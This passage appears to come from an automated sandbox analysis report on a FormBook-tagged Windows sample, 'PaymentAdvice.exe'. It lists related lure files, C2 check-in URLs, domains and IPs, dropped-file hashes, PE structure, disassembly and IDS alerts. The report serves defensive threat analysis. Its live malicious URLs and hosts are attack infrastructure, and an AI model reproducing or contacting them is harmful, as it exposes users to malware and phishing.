                                                                • www.bootstrapexpress.com/aqu2/?5j=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYi4cLf1Thg&_P=2dhtaH9
                                                                Revised Signed Proforma Invoice 000856453553.exeGet hashmaliciousBrowse
                                                                • www.nhu.xyz/fhg5/?Ppm=_6g8CjxH3jrHh&jFNl2H=VbAsszw93WcD6z21S0kZ/XCztDQBFhX49HLTNSyQRl++wquAZ3b8+Wv/gXH+lVuiRgQj
                                                                35.214.93.182PaymentInvoice.exeGet hashmaliciousBrowse
                                                                • www.webinast.com/c22b/?k6A0=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fu0aL3zxHrIzqJQ5A==&Jhk=xN90gjnxaL

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                www.brandschutzglas.comPaymentAdvice.exeGet hashmaliciousBrowse
                                                                • 81.19.159.73
                                                                www.saturnkorp.netPaymentAdvice.exeGet hashmaliciousBrowse
                                                                • 75.126.101.233
                                                                PaymentInvoice.exeGet hashmaliciousBrowse
                                                                • 75.126.101.233
                                                                PaymentInvoice.exeGet hashmaliciousBrowse
                                                                • 75.126.101.233
                                                                PaymentInvoice.exeGet hashmaliciousBrowse
                                                                • 75.126.101.233
                                                                www.plataformaporelmarcanario.comPaymentAdvice.exeGet hashmaliciousBrowse
                                                                • 52.142.208.184
                                                                onbgX3WswF.exeGet hashmaliciousBrowse
                                                                • 52.142.208.184
                                                                PaymentInvoice.exeGet hashmaliciousBrowse
                                                                • 52.142.208.184
                                                                www.vtz6whu5254xb1.xyzPaymentInvoice.exeGet hashmaliciousBrowse
                                                                • 49.156.179.238
                                                                onbgX3WswF.exeGet hashmaliciousBrowse
                                                                • 49.156.179.238
                                                                www.sgdivergence.comPaymentInvoice.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                onbgX3WswF.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                www.abolishlawinforcement.comPaymentInvoice.exeGet hashmaliciousBrowse
                                                                • 66.96.162.131

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                WORLD4YOUATPaymentAdvice.exeGet hashmaliciousBrowse
                                                                • 81.19.159.73
                                                                Purchase_Order_n4379.xlsGet hashmaliciousBrowse
                                                                • 81.19.159.78
                                                                test9.exeGet hashmaliciousBrowse
                                                                • 81.19.159.60
                                                                http://www.mdk-physio.info/stats/esp/99el3ffy/ps447988435296u68vuob3m6ms3psu/Get hashmaliciousBrowse
                                                                • 81.19.145.55
                                                                Status-zu-Sendung-506696250319.docGet hashmaliciousBrowse
                                                                • 81.19.145.40
                                                                Status-zu-Sendung-506696250319.docGet hashmaliciousBrowse
                                                                • 81.19.145.40
                                                                Status-zu-Sendung-506696250319.docGet hashmaliciousBrowse
                                                                • 81.19.145.40
                                                                http://evoqueart.com/myATT/NBFtzzzq_ooezAkh_9QbSAGet hashmaliciousBrowse
                                                                • 81.19.145.40
                                                                53order pdf.exeGet hashmaliciousBrowse
                                                                • 81.19.145.84
                                                                ORDER_20180620.DOCGet hashmaliciousBrowse
                                                                • 81.19.154.98
                                                                invoice_305421.docGet hashmaliciousBrowse
                                                                • 81.19.145.69
                                                                http://lego-kaufen.at/Open-Past-Due-Orders/Get hashmaliciousBrowse
                                                                • 81.19.145.167
                                                                http://www.se-beach-karting.at/Overdue-payment/Get hashmaliciousBrowse
                                                                • 81.19.145.156
                                                                Emotet.docGet hashmaliciousBrowse
                                                                • 81.19.149.200
                                                                Emotet.docGet hashmaliciousBrowse
                                                                • 81.19.149.200
                                                                Emotet4.docGet hashmaliciousBrowse
                                                                • 81.19.149.200
                                                                BODIS-NJUS0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                New Order.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                payment.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                Order.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                PaymentInvoice.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                swift_76567643.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                2021-04-01.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                onbgX3WswF.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                PO.1183.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                Scan-45679.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                Revised Signed Proforma Invoice 000856453553.exeGet hashmaliciousBrowse
                                                                • 199.59.242.153
                                                                GOOGLE-2USBetaling_advies.exeGet hashmaliciousBrowse
                                                                • 35.208.69.149
                                                                Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                                                • 35.214.77.82
                                                                4-1.docGet hashmaliciousBrowse
                                                                • 35.208.24.64
                                                                RFQ- 29012021-756455460 xlxs.exeGet hashmaliciousBrowse
                                                                • 35.208.150.174
                                                                PaymentInvoice.exeGet hashmaliciousBrowse
                                                                • 35.214.93.182
                                                                061-20-SEP-L.docGet hashmaliciousBrowse
                                                                • 35.208.24.64
                                                                331.docGet hashmaliciousBrowse
                                                                • 35.208.24.64
                                                                Swift.exeGet hashmaliciousBrowse
                                                                • 35.209.29.15
                                                                Original Invoice-COAU7230734290.xlsxGet hashmaliciousBrowse
                                                                • 35.208.100.7
                                                                PO_3351_60_20.docGet hashmaliciousBrowse
                                                                • 35.208.24.64
                                                                IMG_501_367_089.docGet hashmaliciousBrowse
                                                                • 35.208.24.64
                                                                Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                • 35.214.215.226
                                                                IMG_071_34_02.docGet hashmaliciousBrowse
                                                                • 35.208.24.64
                                                                RFx 6300306423.xlsxGet hashmaliciousBrowse
                                                                • 35.213.250.90
                                                                Order Inqury-93-23-20.docGet hashmaliciousBrowse
                                                                • 35.208.24.64
                                                                PO_7201_60_74.docGet hashmaliciousBrowse
                                                                • 35.208.24.64
                                                                ps_script.ps1Get hashmaliciousBrowse
                                                                • 35.214.199.246
                                                                RFx 6300306423.xlsxGet hashmaliciousBrowse
                                                                • 35.213.250.90
                                                                PAGO DEL SALDO PENDIENTE DE SOA.EXEGet hashmaliciousBrowse
                                                                • 35.214.116.127
                                                                1m7388e48E.exeGet hashmaliciousBrowse
                                                                • 35.209.145.241

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\9c4j8z4frqpd7zc1x010
                                                                Process:C:\Users\user\Desktop\PaymentAdvice.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6661
                                                                Entropy (8bit):6.6296815878574
                                                                Encrypted:false
                                                                SSDEEP:192:puD7N/LnAKy7uWDpAK7ZcPkPkYuMq9fIN4FE7L3P:puD7NTAGW1KPnpGWQP
                                                                MD5:4ECE2D8EFA5135A9DB156CC14BD4BAA4
                                                                SHA1:3436B53414E1502C72F1EC533B67ECF2D4CB2A77
                                                                SHA-256:9CDD65FD2596E32C1F8E7CC24D7318FA158B84B0AD588338FE0A91CB6EE94403
                                                                SHA-512:6EA6B0C6311839CB6C7A7425E3C887F60C7E0F9507D4551A4B5CE4BD0764E2197E0A2927B8B35F0790FDE2BE34BA1A432C53342F34412EFABE74771755247CD2
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: A*...cD.o..m.\g.....c.T"..c.T.a.`o..m..O@c..cE....cLYL....[.......ma.[[[...ae.[__...ae.___...ma._[[....ma.[[[...ae.[__...ae.___...ma._[[....ma.[[[...ae.[__...ae.___...ma._[[....ma.[[[...ae.[__...ae.___...aa.__[....m.`...m.n...a.h...a.n...a.t...a.j...m.t....m.r....m.p...m.~...a.x...a.~....ae.[__...ae.___...ma._[[...ma.[[[....ae.[__...ae.___...ma._[[....ma.[[[....ae.[__...ae.___...ma._[[....ma.[[[.$.me.[[_..i.$.L.^__.me8^__.@.^__..me.[__.@.Z[[D`...a.P. ..)[.PD....a.`..FN.[.PD....ae.___.G[. _.L@Q...ma._[[.r..._.TDF...me.[[_.h.O2[.XL+...a.@.."v.[.XL....ae.___..^._.TH....m.X.j..._.THx...ma.[[[...a)[.XLi...a.|..J.m.d._...H....ma.[[[.;.gkm.d._...H....ma.[[[g.<.[.H.o..ma.[[[ca._[[o....a.`o.X....o.`i...a..c.Tc..ae.___o.`o..m.Dg.L.c.\....[D...o.X....g8...'......C.[...o..ma.[[[.....meTS__...[.`a$....A....#......i.$.ma0Z_[...............[.d.iaPS[[._q._[[e$..M....#a.T_[....ia.T[[._.(_u.[[_a ..A........m...ca.\[[[$.[.([q.__[e...M^...o....L.o.`c.L...$..[..[. HS.
                                                                C:\Users\user\AppData\Local\Temp\nse41F3.tmp\ic4muy4.dll
                                                                Process:C:\Users\user\Desktop\PaymentAdvice.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4096
                                                                Entropy (8bit):4.151333512519193
                                                                Encrypted:false
                                                                SSDEEP:48:vpgBspoKnM4qq0vOvvOcTLNuLebdsbriB4ZYmRn:B/po94qT2JnktfiuZVRn
                                                                MD5:FCEA56E70876A90B0C60EC7BA70E9B30
                                                                SHA1:DEC05872A2525CCDC225ADBC620E809C199920A9
                                                                SHA-256:9308D8307FD10AD6AD3A48696B353BEEAB443DC13931E37594A845A4E9ED6059
                                                                SHA-512:075DD6EA258329606F34FC607B9E3D842986B139E1C541F73CDCE7C2A3DDFDA9D4C100A0F5C1E1A21A09F97AA1A3AA923F73D9AE6BD381D28BDAAC6C5F6E9913
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...R.n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L..., ..............................................0"...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\v1q9hgnkdhn69j4o932
                                                                Process:C:\Users\user\Desktop\PaymentAdvice.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):164864
                                                                Entropy (8bit):7.998764468176309
                                                                Encrypted:true
                                                                SSDEEP:3072:d0KAsddxWkAfp/M5e+oMS885Lba5jq/HltPX25hcjuQfqq4/H:iKBnOpsvV85Lbmq/F92DcyQfqj
                                                                MD5:24DEB1E3972821F5540014A80FEFF6B0
                                                                SHA1:75390DA39428FB16D225851E4331681A6AA49984
                                                                SHA-256:1E13BF9EDAEE2DC001F2EB5960C0FAD8541C3B3F82BC099D85D15CB95F511CAB
                                                                SHA-512:32048E34CAC8F2BAA9D2AA2CC19BF57AB7B7D726DBD9067A0A8899F962FD09B01B90835DD44971C6D133CBC4F3B09BE80C0A35D09CE0AC22F2148E53BC87C5DA
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: B*z...L..-.P...D".4,.....:.S..j.....z|&......c......:t.S.....)S.F.Zl.a.N......M6w.M.I{....BP..............>dPS..k....Z..j...).wFx.ff..x.....1..?s...yH2[j.....%.jf......c.U....}D/b...!=G..Xw.C~..s...ok..f.0......VF...H....&..3.%.[.Qz.`.#b.....[l.).s..P.#/\$...3.. ..:..e.{7_.?..!].`.Y:..C..;a....f.j...X5.G.tF}. .O.F)....~......W...%..7D...$GC..zK..'M..n.....W....8..l..dB2.[.j.(.On.........V&,..........|.d..J...'M#.A.v..h..w..Wq...9..y./{v...../m[..M SM.o...D..x).V......@.Eo......7.d~7:....v.8q.v...[..j........6..]An.Y.w.n..;.N..".. p..&.f...........6`..5,.$...W...@.9....H....L.Y%...[.Z#..... ..!9].s..A......0e.$.A.pJ..{s4!.......L..y0.$....n..v...3\!">2...K%.....*.C.F...AW...X.......v..R8.....:6?C..<......9...V...S....Ax../.g.|E..SG.k.K....~....N....G...n.Y.Op......Q.|Gx=,......0a..@v.~..b.K..mr.f;.:.q.O....e..%..p..P.g...^..s.=b.T.....`.Y..n...R........;.'.r{.A....fH=.....E..M9k........y5......=.....}.Du..x.f...)...............5...B.....u....O.K

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.105149467378694
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:PaymentAdvice.exe
                                                                File size:357134
                                                                MD5:91937d3f9e93657c18129ff519b7f340
                                                                SHA1:d9acfebf2120d984d76bdf883094707305897691
                                                                SHA256:397fd95899f186c1385818c6b996f4cb410e266a84b2c134104d01675a822e27
                                                                SHA512:5750d58265a25f8f438d939a9d32d0634f5483a17a357805240eec4cff8e544e8580ad880ae85c9fb74b5e3a70b6b24c4bf96a58bab0d847f07dddd019d63ca5
                                                                SSDEEP:3072:3yewmN4skJ3pn+w2xYQO26G0KAsddxWkAfp/M5e+oMS885Lba5jq/HltPX25hcjO:3dtpYKBnOpsvV85Lbmq/F92DcyQfqj
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....<.....J1.....

                                                                File Icon

                                                                Icon Hash:70f8f0b2daf8f0b8

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x40314a
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                DLL Characteristics:
                                                                Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                Entrypoint Preview

                                                                Instruction
                                                                sub esp, 0000017Ch
                                                                push ebx
                                                                push ebp
                                                                push esi
                                                                xor esi, esi
                                                                push edi
                                                                mov dword ptr [esp+18h], esi
                                                                mov ebp, 00409240h
                                                                mov byte ptr [esp+10h], 00000020h
                                                                call dword ptr [00407030h]
                                                                push esi
                                                                call dword ptr [00407270h]
                                                                mov dword ptr [007A3030h], eax
                                                                push esi
                                                                lea eax, dword ptr [esp+30h]
                                                                push 00000160h
                                                                push eax
                                                                push esi
                                                                push 0079E540h
                                                                call dword ptr [00407158h]
                                                                push 00409230h
                                                                push 007A2780h
                                                                call 00007FD94C919D08h
                                                                mov ebx, 007AA400h
                                                                push ebx
                                                                push 00000400h
                                                                call dword ptr [004070B4h]
                                                                call 00007FD94C917449h
                                                                test eax, eax
                                                                jne 00007FD94C917506h
                                                                push 000003FBh
                                                                push ebx
                                                                call dword ptr [004070B0h]
                                                                push 00409228h
                                                                push ebx
                                                                call 00007FD94C919CF3h
                                                                call 00007FD94C917429h
                                                                test eax, eax
                                                                je 00007FD94C917622h
                                                                mov edi, 007A9000h
                                                                push edi
                                                                call dword ptr [00407140h]
                                                                call dword ptr [004070ACh]
                                                                push eax
                                                                push edi
                                                                call 00007FD94C919CB1h
                                                                push 00000000h
                                                                call dword ptr [00407108h]
                                                                cmp byte ptr [007A9000h], 00000022h
                                                                mov dword ptr [007A2F80h], eax
                                                                mov eax, edi
                                                                jne 00007FD94C9174ECh
                                                                mov byte ptr [esp+10h], 00000022h
                                                                mov eax, 00000001h

                                                                Rich Headers

                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x25bdf.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .rsrc0x3ac0000x25bdf0x25c00False0.338453280215data5.34146609609IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_ICON0x3ac2e00x7108PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                RT_ICON0x3b33e80x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                RT_ICON0x3c3c100x5488data
                                                                RT_ICON0x3c90980x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                RT_ICON0x3cd2c00x25a8data
                                                                RT_ICON0x3cf8680x10a8data
                                                                RT_ICON0x3d09100x988data
                                                                RT_ICON0x3d12980x468GLS_BINARY_LSB_FIRST
                                                                RT_DIALOG0x3d17000x100dataEnglishUnited States
                                                                RT_DIALOG0x3d18000x11cdataEnglishUnited States
                                                                RT_DIALOG0x3d191c0x60dataEnglishUnited States
                                                                RT_GROUP_ICON0x3d197c0x76data
                                                                RT_MANIFEST0x3d19f40x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                04/08/21-12:39:40.904517TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.566.96.162.131
                                                                04/08/21-12:39:40.904517TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.566.96.162.131
                                                                04/08/21-12:39:40.904517TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.566.96.162.131
                                                                04/08/21-12:40:07.392083TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.5108.167.140.96
                                                                04/08/21-12:40:07.392083TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.5108.167.140.96
                                                                04/08/21-12:40:07.392083TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.5108.167.140.96
                                                                04/08/21-12:40:13.082386TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.5
                                                                04/08/21-12:40:18.180223TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.552.142.208.184
                                                                04/08/21-12:40:18.180223TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.552.142.208.184
                                                                04/08/21-12:40:18.180223TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.552.142.208.184
                                                                04/08/21-12:40:30.030371TCP1201ATTACK-RESPONSES 403 Forbidden804973975.126.101.233192.168.2.5
                                                                04/08/21-12:40:35.274483TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.5199.59.242.153
                                                                04/08/21-12:40:35.274483TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.5199.59.242.153
                                                                04/08/21-12:40:35.274483TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.5199.59.242.153
                                                                04/08/21-12:40:41.011044TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.5154.90.117.58
                                                                04/08/21-12:40:41.011044TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.5154.90.117.58
                                                                04/08/21-12:40:41.011044TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.5154.90.117.58

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 8, 2021 12:39:40.789573908 CEST4972980192.168.2.566.96.162.131
                                                                Apr 8, 2021 12:39:40.904059887 CEST804972966.96.162.131192.168.2.5
                                                                Apr 8, 2021 12:39:40.904232025 CEST4972980192.168.2.566.96.162.131
                                                                Apr 8, 2021 12:39:40.904516935 CEST4972980192.168.2.566.96.162.131
                                                                Apr 8, 2021 12:39:41.019202948 CEST804972966.96.162.131192.168.2.5
                                                                Apr 8, 2021 12:39:41.035171032 CEST804972966.96.162.131192.168.2.5
                                                                Apr 8, 2021 12:39:41.035185099 CEST804972966.96.162.131192.168.2.5
                                                                Apr 8, 2021 12:39:41.035372019 CEST4972980192.168.2.566.96.162.131
                                                                Apr 8, 2021 12:39:41.035423994 CEST4972980192.168.2.566.96.162.131
                                                                Apr 8, 2021 12:39:41.149666071 CEST804972966.96.162.131192.168.2.5
                                                                Apr 8, 2021 12:39:46.080517054 CEST4973080192.168.2.535.214.93.182
                                                                Apr 8, 2021 12:39:46.122618914 CEST804973035.214.93.182192.168.2.5
                                                                Apr 8, 2021 12:39:46.122750044 CEST4973080192.168.2.535.214.93.182
                                                                Apr 8, 2021 12:39:46.122944117 CEST4973080192.168.2.535.214.93.182
                                                                Apr 8, 2021 12:39:46.164413929 CEST804973035.214.93.182192.168.2.5
                                                                Apr 8, 2021 12:39:46.172902107 CEST804973035.214.93.182192.168.2.5
                                                                Apr 8, 2021 12:39:46.172936916 CEST804973035.214.93.182192.168.2.5
                                                                Apr 8, 2021 12:39:46.173075914 CEST4973080192.168.2.535.214.93.182
                                                                Apr 8, 2021 12:39:46.173142910 CEST4973080192.168.2.535.214.93.182
                                                                Apr 8, 2021 12:39:46.214449883 CEST804973035.214.93.182192.168.2.5
                                                                Apr 8, 2021 12:39:51.223727942 CEST4973180192.168.2.5184.168.131.241
                                                                Apr 8, 2021 12:39:51.401798010 CEST8049731184.168.131.241192.168.2.5
                                                                Apr 8, 2021 12:39:51.401945114 CEST4973180192.168.2.5184.168.131.241
                                                                Apr 8, 2021 12:39:51.402147055 CEST4973180192.168.2.5184.168.131.241
                                                                Apr 8, 2021 12:39:51.580137968 CEST8049731184.168.131.241192.168.2.5
                                                                Apr 8, 2021 12:39:51.606599092 CEST8049731184.168.131.241192.168.2.5
                                                                Apr 8, 2021 12:39:51.606637955 CEST8049731184.168.131.241192.168.2.5
                                                                Apr 8, 2021 12:39:51.609797955 CEST4973180192.168.2.5184.168.131.241
                                                                Apr 8, 2021 12:39:51.609961987 CEST4973180192.168.2.5184.168.131.241
                                                                Apr 8, 2021 12:39:51.787822962 CEST8049731184.168.131.241192.168.2.5
                                                                Apr 8, 2021 12:40:01.991251945 CEST4973280192.168.2.581.19.159.73
                                                                Apr 8, 2021 12:40:02.025295973 CEST804973281.19.159.73192.168.2.5
                                                                Apr 8, 2021 12:40:02.025412083 CEST4973280192.168.2.581.19.159.73
                                                                Apr 8, 2021 12:40:02.025681973 CEST4973280192.168.2.581.19.159.73
                                                                Apr 8, 2021 12:40:02.060189009 CEST804973281.19.159.73192.168.2.5
                                                                Apr 8, 2021 12:40:02.060216904 CEST804973281.19.159.73192.168.2.5
                                                                Apr 8, 2021 12:40:02.060676098 CEST4973280192.168.2.581.19.159.73
                                                                Apr 8, 2021 12:40:02.061580896 CEST804973281.19.159.73192.168.2.5
                                                                Apr 8, 2021 12:40:02.061651945 CEST4973280192.168.2.581.19.159.73
                                                                Apr 8, 2021 12:40:02.091130018 CEST804973281.19.159.73192.168.2.5
                                                                Apr 8, 2021 12:40:07.243345976 CEST4973380192.168.2.5108.167.140.96
                                                                Apr 8, 2021 12:40:07.390485048 CEST8049733108.167.140.96192.168.2.5
                                                                Apr 8, 2021 12:40:07.392054081 CEST4973380192.168.2.5108.167.140.96
                                                                Apr 8, 2021 12:40:07.392082930 CEST4973380192.168.2.5108.167.140.96
                                                                Apr 8, 2021 12:40:07.539179087 CEST8049733108.167.140.96192.168.2.5
                                                                Apr 8, 2021 12:40:07.883732080 CEST4973380192.168.2.5108.167.140.96
                                                                Apr 8, 2021 12:40:08.071639061 CEST8049733108.167.140.96192.168.2.5
